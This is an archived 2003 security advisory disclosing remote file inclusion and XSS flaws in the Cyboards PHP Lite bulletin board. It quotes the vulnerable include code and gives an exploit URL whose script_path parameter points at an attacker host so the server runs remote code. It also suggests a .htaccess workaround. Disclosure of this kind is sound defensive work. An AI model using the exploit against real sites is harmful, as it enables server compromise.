Cyboards Remote Code Execution

2003-01-21T00:00:00
ID SECURITYVULNS:DOC:3994
Type securityvulns
Reporter Securityvulns
Modified 2003-01-21T00:00:00

Description

Cyboards PHP Lite Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )

<------- ------->


Vendor Information:

Homepage : http://www.gold-sonata.com Vendor : informed Mailed advisory: 13/01/03 Vender Response : None yet (possibly because they have no contact page and the report was sent to abuse@gold-sonata.com)


Affected Versions:

1.25 and prior (tested on 1.25 and 1.21)


Description:

Cyboards PHP Lite is a free open-source bulletin board programmed in php. A couple of vulnerabilites exist in the /include directory which may result in allowing the attacker to execute remote code on the server with webserver permission. Another vulnerability which can be found in /include directory may allow attacker to hijack other members accounts through XSS.


Exploit:

XSS:

Possible in the following files and possibly more:

include/default_header.php include/options_form.php adminopts/login_form.php adminopts/include/ban_form.php adminopts/include/board_form.php adminopts/include/login_form.php adminopts/include/vip_form.php

Remote Arbitrary Code Execution:

In a couple of files inside the include directory the php files do not check safely for inclusion and allow remote users to call them directly. The result of this problem would allow remote attacker to include their own remote arbitrary code and run it on the server.

  1. include/default_header.php

-- This file looks something like this --


..

if(isset($board_config["stylesheet"])&&(trim($board_config["stylesheet"])!="")) { echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n"; } else { echo "<style>\n"; include("$script_path/include/default_style.css"); echo "\n</style>"; }

..


By default, $board_config["stylesheet"] is not set since it has not been included inside another forum file. This means that include("$script_path/include/default_style.css"); will be executed. By creating a directory called include on the attacker's server and placing the desired code inside default_style.css, and attacker can trick the inclusion and make it include the wrong css file. By doing so, php will execute the attackers code. The URI looks something like this:

http://victim/forum/include/default_header.php?script_path=http://attacker

where the attacker has created a directory called /include and inside a file called default_style.css which contains the malicious code.

  1. include/options_form.php

Contains the following code on the first line:

---=--- <? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?> ---=--- *

Note: An attacker can use this for a XSS attack as well, but given the possibilty of running remote code on the server it is more probable he/she will use it for remote code execution.


Solution:

Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /include directory and that should block remote users from accessing it.


Greetz:

Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.

<------- ------->

Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427